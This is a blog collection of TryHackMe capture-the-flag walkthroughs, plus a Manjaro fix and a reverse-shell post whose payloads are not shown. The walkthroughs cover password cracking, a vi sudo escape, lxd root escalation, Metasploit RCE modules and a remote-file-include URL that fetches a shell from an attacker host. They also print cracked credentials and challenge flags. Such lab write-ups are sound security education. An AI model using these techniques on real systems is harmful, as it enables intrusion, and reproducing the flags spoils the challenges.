Chocolate Factory – Walkthrough

[Chocolate Factory] – TryHackMe

Starting off this challenge, we can see from the tags on TryHackMe that it involves steganography and privilege escalation (that second one being a given). As well, the questions tell us one of the usernames is ‘charlie’. Really no surprise there. Let’s enumerate the box and start poking at some images.

While that scan ran (and it returned a lot of interesting information), I browsed to the website and grabbed the image.png from the CSS background. As well, I connected to the FTP service, which allowed anonymous access, and there was another image there named ‘gum_room.jpg’.

Inside ‘gum_room.jpg’ was a base64-encoded file which, once decoded, ended up being their entire /etc/passwd (presumably).

Above is the ‘b64.txt’ file embedded within ‘gum_room.jpg’, and below is the base64-decoded content, which is already being attacked by John the Ripper.

The username charlie cracked with a password of cn7824. These credentials worked to log into the squirrel room, which seemingly allows us to execute commands on the server (we’ll continue to grab any images we find and poke around). These credentials did not work for SSH.

We use the command injection script to poke around and grab the ‘key_rev_key’ file. The strings command reveals the answer to the first question; the “key” is b’-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=’.

We stabilize the shell so we can attempt to sudo or su into the user charlie (since the cracked password didn’t work for SSH). But neither of those works either. So we simply jump into his home directory, where we can see that the files teleport and teleport.pub are an SSH key pair. Sure enough, we copy teleport down to our machine, chmod it to 600 and ssh in as user charlie.

Next we check sudo -l to see what commands we might be able to run through sudo, and we see gold: it allows /usr/bin/vi. So, a quick sudo /usr/bin/vi and then break out with :!/bin/sh and we’re root.

Finally, we’re not quite done yet: there’s no root flag sitting in the folder, just a Python script. We notice it asks for the key, so we provide the key found in the ELF binary earlier and it gives us our final flag.

Pretty quick and easy. Once again, it took a lot longer to write up than to actually do. I wasted some time playing with steganography when there was really only one tiny portion it was used for.

/home/charlie/user.txt:
flag{cd5509042371b34e4826e4838b522d2e}

/root/root.py:
flag{cec59161d338fef787fcb4e296b42124}

Looking Glass – Walkthrough

[Looking Glass] – TryHackMe

The last Alice in Wonderland themed room was really fun, in my opinion. So, I was excited to take a crack at the next one. We start as always with nmap and immediately find some fun funky shit. Look at all these ports!

So, we have a few issues here. I tend to operate from my daily driver and wasn’t in the mood to launch the attack box, but Looking Glass is responding with a very insecure SSH key (RSA with SHA-1). I decide to go ahead and accept it, creating a config for this specific host in ~/.ssh/config that I will delete later.

Now we can connect to these ports, and we run into the first game.

It responds “Lower”. We try one on the higher end and it says “Higher”. We’ve been told it’s a mirror, so obviously it means the opposite: “Lower” means the port is higher, and “Higher” means the port is lower.
We don’t have all day, so we automate this with a bash script.
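
The mirrored guessing game, as an added Python example rather than the bash script used in the post: the simulated service answers the opposite of the truth, so the search moves up on “Lower” and down on “Higher”. The port range, the ‘Found’ reply and the probe function are assumptions standing in for the real SSH connection; 12394 is the port the post’s script stopped at.

```python
# Added example, not the post's bash script: binary-search the Looking Glass
# port game, whose replies are mirrored ("Lower" means the real port is higher).
LOW, HIGH = 9000, 13999   # constructed search range, not taken from the post
HIDDEN_PORT = 12394       # the port the post's script stopped at


def make_oracle(hidden):
    """Simulate the mirrored service so the search can run offline."""
    def probe(port):
        if port == hidden:
            return "Found"           # assumed reply; the real text may differ
        # The honest answer would be "Higher" when hidden > port; the mirror flips it.
        return "Lower" if hidden > port else "Higher"
    return probe


def find_port(probe, low, high):
    """Return (port, probes_used); probe(port) yields the service's reply string."""
    probes = 0
    while low <= high:
        mid = (low + high) // 2
        reply = probe(mid)
        probes += 1
        if reply == "Found":
            return mid, probes
        if reply == "Lower":       # mirrored: the real port is above mid
            low = mid + 1
        elif reply == "Higher":    # mirrored: the real port is below mid
            high = mid - 1
        else:
            raise ValueError(f"unexpected reply {reply!r} for port {mid}")
    raise LookupError("no port in the range answered 'Found'")


if __name__ == "__main__":
    port, used = find_port(make_oracle(HIDDEN_PORT), LOW, HIGH)
    print(f"found port {port} after {used} probes")  # 11 probes for this range
```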

My script stops at port 12394. So, let’s see what’s here.

Time to crack this; I break out CyberChef (TheAlphabetCipher, bewareTheJabberwock).

jabberwock:GyroscopeStupiderPerfectlyIngenuity

The user.txt flag is obviously reversed:

}32a911966cab2d643f5d57d9e0173d56{mht

Flipping it returns:

thm{65d3710e9d75d5f346d2bac669119a23}

The root flag is reversed as well (kind of redundant at this point, but consistency can be a virtue):

}f3dae6dec817ad10b750d79f6b7332cb{mht

Gaming Server – Walkthrough

[Gaming Server] – TryHackMe

This is a CTF walkthrough for the [Gaming Server] room on TryHackMe. Written live, so you can see what goes through my mind during a capture the flag campaign. [Gaming Server] has an estimated difficulty of easy.

First things first, enumerate:

So far, we likely have an Ubuntu box running OpenSSH and Apache. We’ll continue by brute-forcing possible directories and files on Apache while running a more intrusive nmap scan.

While those run, we’ll manually poke around the website and see what we can find.

By viewing the source, we see an HTML comment left for a ‘john’, a potential username. As well, our brute force turns up two interesting directories: uploads and secret.

The directory ‘secret’ holds a file ‘secretKey’ which looks like an SSH RSA key. If it is password protected, we’ll pass it to john (the password cracker), otherwise we’ll hope it’s the user John’s SSH key.

The uploads directory gives us a dictionary/wordlist which will likely be useful. As well, it contains a copy of the ‘Hacker’s Manifesto’ (originally published in Phrack a very long time ago.. always a classic) and an image that may contain something (any of those files may contain something; we’ll binwalk them).

Binwalk doesn’t turn up anything obvious, so we also run exiftool against the image to see if there are any other potential usernames or similar lurking around. Nothing blatantly obvious. So, we go ahead and try to ssh as ‘john’ using the SSH key we found. It turns out that it is password protected. So, we use ssh2john on it and set john against it using the dictionary we found.

John busts it open with a password of letmein.

Our first flag is waiting in the john user’s home folder, named user.txt; its contents are: a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e.

So far, I have spent much, much more time writing this than working on the challenge.

An attempt to see what commands we can run with sudo shows us that john’s password is not letmein. Apparently, that only protects his SSH key. We also don’t see anything too unusual with SUID or SGID set. So, we transfer linpeas.sh over to automate discovery.

Short of finding anything else, we’re in the lxd group. So, we’re going to go ahead and vertically elevate ourselves to root by launching a small Alpine image and mounting the outer system as root.

The above commands grab a small Alpine Linux container image, change directories, build the image and then make it available from our attacking machine. So, we will now be able to download it onto the target and exploit it.

Another one that was a little too easy. As I said before, this took longer to write than the room took to clear. Oh well, there you have it.

Some Random Fixes for Manjaro

Error: Sparse file not allowed [GRUB]

While running Manjaro Linux on btrfs, you may run into this seemingly harmless notification at boot time:

Error: Sparse file not allowed.
Press any key to continue...

Here’s how I got this to go away.

Edit /etc/default/grub and change GRUB_SAVEDEFAULT=true to GRUB_SAVEDEFAULT=false

Now run update-grub and reboot.

2022-01-24T14:16:17-05:00 | January 22nd, 2022 | Categories: Engineering

Building a Perfect FreeBSD Desktop

2022-01-24T15:05:26-05:00 | January 22nd, 2022 | Categories: Engineering

FreeBSD Kernel Config for VirtualBox Guests

2022-01-21T19:38:05-05:00 | January 21st, 2022 | Categories: Engineering

Reverse Shells

I used to keep these sprawled out across several blog posts. But, I’ve decided to scrap that whole approach and create a “reverse shell generator”. In the future, this post will either contain that generator or it will contain a link to it at the bottom. Anyway, while I work on that, here are all of the old ones that I had previously posted on the website for your convenience.

For the most part, you’d use these by setting up a netcat-style listener on your machine (or a machine you control), replacing “your-ip” with the IP address of the machine you want to connect out to and “your-port” with the port you’ve chosen to listen on.

Python

Perl

Making use of the /bin/sh binary:

Without a binary:

Another one without a binary:

PHP

Ruby

Java

BASH

Netcat

Netcat binaries that support ‘-e’

Netcat binaries without support for ‘-e’

Telnet

Using a file socket:

Using a “pipe”:

Xterm

Bolt – Walkthrough

[Bolt] – TryHackMe

This one is rated easy and it shows its colors that way. It’s a super typical CTF for beginners and takes no time at all for anyone with any kind of knowledge. A foothold is given to you, you’re not required to be even slightly creative to turn that foothold into shell access, and the server is misconfigured, giving you root right away.

You absolutely should not need my help for this; if you do, either you’re drunk, drawing a blank, or you really need to go back and work some of the learning rooms available at TryHackMe.

We start off with nmap, hunting for web ports. We know from the room name that it’s going to involve the popular Bolt CMS. So, we expect to find web ports and to probably have to enumerate directories.

Right away, we have options. But, we decide to play by the rules and stay in our lane. We note that ports 80 and 8000 are open, one serving Apache 2.4.29 and the other seeming to run self-hosted off of PHP 7.2.32-1. Without a list of potential users, we ignore SSH.. though there’s plenty of fun that could be had there.

I choose lulzbuster and set it after both ports, hoping that I don’t bog down the VM.. it doesn’t find anything unusual, just default pages on Apache, and it finds Bolt on 8000 along with a few folders. But, before I can even explore those folders, I’m on the page and there’s a post from the admin telling us his name is Jake and that his username is bolt (no idea why he shares this). I note that it’s posted by ‘Admin’, but we all know that can be a display name. I just write it down in case ‘bolt’ is a rabbit hole, though I’m aware bolt is the default username for Bolt CMS already.

I notice there’s a “read more” link and expand the post; nothing is added except an obvious link, “For IT Staff”, which I click. He boldly (boltly? lol) tells us his password is boltadmin123. So, we have our first two answers:

bolt

boltadmin123

We find the well-known Bolt administrative login right where it should be, at /bolt/login, try our credentials and land inside to answer the next question. Its version is Bolt 3.7.1.

The next question asks us about a metasploit module for a previous version of bolt, which was interesting. So, I launch msfconsole and search for bolt, answer the question.

exploit/unix/webapp/bolt_authenticated_rce

The exploit-db id is: 48296

Now, I’m just curious why they had us look up two old exploits that shouldn’t work on this release of Bolt, so I fill in the options for Metasploit and run the RCE it has for the previous version. Surprisingly, it works. So, I find the flag at /home/flag.txt, which I’d post here, but I’ve already closed that browser window. Sorry about that; I found it more necessary to go send an e-mail to the CVE maintainers to update the information they have for this vulnerability, because it’s clearly not fixed by 3.7.1.

Quick and easy; it would’ve been annoyingly boring, except it turned into fun by noticing that what people thought was fixed in 3.7.1 was NOT fixed.

Skynet – Walkthrough

[Skynet] – TryHackMe

I’m rebuilding the Skynet CTF on TryHackMe from vague notes. So, I apologize for anything that’s mildly off. I’ve been drinking and it was a few days ago. We always start off with enumeration: portscan, banner grab, service check, the usual. My ctf_quick alias is ‘sudo nmap -sS -sV -O -vvv -T4 --script=vulners --script=intrusive --script-timeout=2m -oA ctf_quick’. I often attach a few more flags if needed, namely ‘-p- -Pn’, if I want to be sure to check all ports or if the target doesn’t respond to ICMP requests. My ctf_deep is mostly the same: script-timeout is set to 5 minutes, there’s no -T4 flag and version intensity is set to 9. For both, I have an alias BRUTE='--script-args userdb=top-probable,passdb=1000worst' that I can pop in there, though generally I’ll only pop that into the deep scan with the longer timeout, for obvious reasons.

It has a webserver, so we go ahead and launch a directory scanner too. I used either the directory-list 2.3 lowercase medium or the big list from SecLists/Discovery/Web-Content. It picks up a few folders, most of which 403: admin, config and ai for sure.. there’s also css and js; I forget if they 403’d or not, but either way, they weren’t enlightening. /squirrelmail sticks out, however; we know what that is, and the questions ask about email content. So, it’s a great place to start. Just bear in mind, e-mail accounts may not have shell access and/or authorization may vary.

When nmap finishes, we notice there’s a Samba share. We enumerate it, and it picks up a few shares and a user ‘milesdyson’. Accessing the only share that allows anonymous access reveals log1.txt, and it looks like a wordlist. The CTF is Skynet and it’s all Terminator themed (Miles Dyson, etc.. etc.). We set hydra to work on SquirrelMail using the milesdyson user and the wordlist, and it cracks with a password of cyborg007haloterminator (this CTF is considered easy). Logging in, we see emails from the host itself regarding milesdyson’s Samba password, so we write that down: )s{A&2Z=F^n_E.B`

We note emails from a potential user ‘serenakogan’ and a binary-encoded email. We decode it; it’s mostly uninteresting, saying ‘balls have zero to me to me to me to me to me to me to me’. serenakogan’s next e-mail is similar, almost the same. We check milesdyson’s Samba share with his credentials and they work, yay. He’s messaged himself about finishing the new CMS and mentions a string of nonsensical characters, 45kra24zxs28v3yd. Given that the question asks about a hidden directory (and neither squirrelmail nor the others are very hidden at all), plus the fact that important.txt mentions finishing a CMS, we try to browse to that folder, and it exists. It looks benign, but we go ahead and brute force directories here too, and we find another one, administrator, which is running CuppaCMS. So, we set the string aside in a note; it could still be a password or need to be cracked or decoded.

We look for vulnerabilities for CuppaCMS and find there’s a nasty file include vulnerability (it allows both remote file include and local file include). Local is easier to perform, so we check the obvious things: /etc/passwd (to confirm the actual user accounts that exist on the host), and CuppaCMS reveals MySQL credentials, root:password123. Informative, but nothing groundbreaking, so we go ahead with a remote file include. I used weevely3, but you can use whatever. Make the RFI available with python3’s built-in webserver (or any webserver). My include looked like this: http://ctf-target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt?
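
Seen from the defender’s side, an include like the one above leaves a tell in the web server log: a query-parameter value that is an absolute URL (remote include) or a traversal path (local include). Here is an added Python example, not from the post, that flags such parameters in constructed Apache combined-format log lines; the scheme check also fires on legitimate redirect parameters, so hits are triage leads to correlate, not verdicts.

```python
# Added example, not from the post: flag remote/local file-include attempts,
# such as the urlConfig= request above, in Apache combined-format access logs.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines for the demo; IPs, timestamps and sizes are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:03:12:44 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://attacker:8000/shell.txt? HTTP/1.1" 200 512 "-" "curl/7.68.0"
10.0.0.5 - - [01/Jan/2022:03:13:01 -0500] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/7.68.0"
10.0.0.7 - - [01/Jan/2022:03:14:10 -0500] "GET /squirrelmail/src/login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2022:03:14:12 -0500] "GET /index.php?page=about&redirect=https%3A%2F%2Fexample.org HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3})")
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://")   # absolute URL: RFI candidate
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")     # ../ or ..\ anywhere: LFI candidate
SENSITIVE_PREFIXES = ("/etc/", "/proc/", "/var/log/")    # absolute paths worth a look


def classify_value(raw):
    """Return 'rfi', 'lfi' or None for one query-parameter value."""
    value = unquote(unquote(raw))  # peel double URL-encoding as well
    if SCHEME_RE.match(value):
        return "rfi"
    if TRAVERSAL_RE.search(value) or value.startswith(SENSITIVE_PREFIXES):
        return "lfi"
    return None


def scan_log(text):
    """Return (ip, status, path, param, kind) for every suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                hits.append((m["ip"], int(m["status"]), parts.path, name, kind))
    return hits


if __name__ == "__main__":
    for ip, status, path, name, kind in scan_log(SAMPLE_LOG):
        print(f"{kind.upper():4} {ip:<10} {status} {path} param={name}")
```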

I used the shell to throw down a meterpreter and went straight for root using exploit/linux/local/ufo_privilege_escalation. It worked. Working backwards, another user was admin:b686468aec2c71e1783375763dca9b7e.

Sorry for the crap write-up.

2022-01-24T02:39:41-05:00 | January 1st, 2022 | Categories: CTF Walkthroughs

Advent of Cyber (2019) – TryHackMe – Day17

[Day 17] Hydra-ha-ha-haa

This room is just using the hydra tool to brute-force a web form and then SSH. Reading the description informs you that the once-popular rockyou.txt wordlist is recommended (I advise you to follow those kinds of tips).

2021-12-29T16:55:36-05:00 | December 29th, 2021 | Categories: CTF Walkthroughs

Blog – CTF Walkthrough – TryHackMe

[Blog] – CTF Walkthrough – TryHackMe

Billy Joel made a blog? First, we need to follow the instructions and add blog.thm to our /etc/hosts file (Windows users, your hosts file is under system32, somewhere).

Right away, browsing to the blog, we can see WordPress, an author-level user with the account kwheeler (Karen Wheeler), who is supposedly Billy Joel’s mom, and 2 comments. We make note of the default 2020 theme, as well as the WordPress 5.0 generator meta tag (it’s already vulnerable). We can also add bjoel as a target WordPress user from the comments (nmap detected this as well, so.. doubly exposed).

We’ll be wanting to WPScan this. We also have several SMB shares (samba, ubuntu), Apache 2.4.49 and OpenSSH.. at this point, I go ahead and start a brute force on bjoel over SSH with the rockyou wordlist (might work).

Choosing Billy Joel’s account instead of Karen’s didn’t come from nowhere. For starters, kwheeler is the WordPress administrator, so we’ll likely get her credentials more easily. But, first and foremost, one of the Samba shares is “BillySMB”, so clearly he has a user-level account on the system (or it’s extremely likely).

We notice our hydra brute force is bogging down the VM, so we cancel it for now. Let’s go ahead and grab the files off of BillySMB.

While we’re fucking around, WPScan cracks kwheeler’s WordPress user wide open; the password is cutiepie1. We launch Metasploit and run ‘search wordpress 5.0’, and we immediately find remote code execution. Rather than fiddle around outside of a pty, we try to ssh in with those credentials, to no avail. So, Metasploit it is. We shut down our scanners, brute forcers and all of that. The exploit wp_crop_rce works just fine, gives us www-data user access, and we elevate privileges with sudo_baron_samedit. The box is rooted.

2022-01-22T22:12:00-05:00 | December 24th, 2021 | Categories: CTF Walkthroughs

Advent of Cyber (2019) – TryHackMe – Day16

[Day 16 – Advent of Cyber (2019)]

File Confusion

Sorry, I’m not going to go back and jot down the how-tos for all of the other days. Besides, there’s plenty of help floating around the internet for basically any capture the flag game.

Obligatory link to TryHackMe

Download the Task Files and read the supporting material.

How many files did you extract (excluding all the .zip files): 50

How many files contain Version: 1.1 in their metadata?: 3

Which file contains the password? dL6w.txt
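
The unpack-and-count work the three questions above ask for, as an added Python example (not the post’s own commands): it extracts nested archives recursively, tallies the non-zip files and those containing ‘Version: 1.1’, and refuses any member whose path would land outside the extraction directory (zip-slip). The archives are constructed inside the code, so its counts are not the room’s 50 and 3.

```python
# Added example, not the post's own commands: unpack a nested zip tree as the
# Day 16 task needs and count the results, refusing zip-slip members.
import io
import os
import tempfile
import zipfile

MARKER = "Version: 1.1"  # the metadata string the Day 16 question asks about


def safe_extract(zip_path, dest):
    """Extract one archive into dest, rejecting members that would escape it."""
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"refusing traversal entry: {info.filename}")
            zf.extract(info, dest_real)


def extract_nested(root):
    """Unpack every .zip under root beside itself, repeating for new arrivals."""
    done = set()
    while True:
        todo = [os.path.join(d, f) for d, _, fs in os.walk(root)
                for f in fs if f.endswith(".zip") and os.path.join(d, f) not in done]
        if not todo:
            return
        for z in todo:
            safe_extract(z, os.path.dirname(z))
            done.add(z)


def tally(root):
    """Return (non-zip file count, how many of those contain MARKER)."""
    paths = [os.path.join(d, f) for d, _, fs in os.walk(root)
             for f in fs if not f.endswith(".zip")]

    def has_marker(p):
        with open(p, encoding="utf-8", errors="ignore") as fh:
            return MARKER in fh.read()
    return len(paths), sum(map(has_marker, paths))


def zip_bytes(members):
    """Constructed helper: build an in-memory zip from a {name: content} dict."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def demo(hostile=False):
    """Write a constructed outer.zip holding two inner zips, unpack and tally."""
    a = zip_bytes({"a1.txt": "Version: 1.1\nhello", "a2.txt": "Version: 1.0"})
    b = zip_bytes({"b1.txt": "Version: 1.1\npass", "b2.txt": "nothing"})
    top = {"a.zip": a, "b.zip": b, "readme.txt": "top level"}
    if hostile:  # a member name that tries to climb out of the working tree
        top["../escape.txt"] = "must never be written"
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "outer.zip"), "wb") as fh:
            fh.write(zip_bytes(top))
        extract_nested(root)
        return tally(root)
```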

2022-01-24T00:22:48-05:00 | December 23rd, 2021 | Categories: CTF Walkthroughs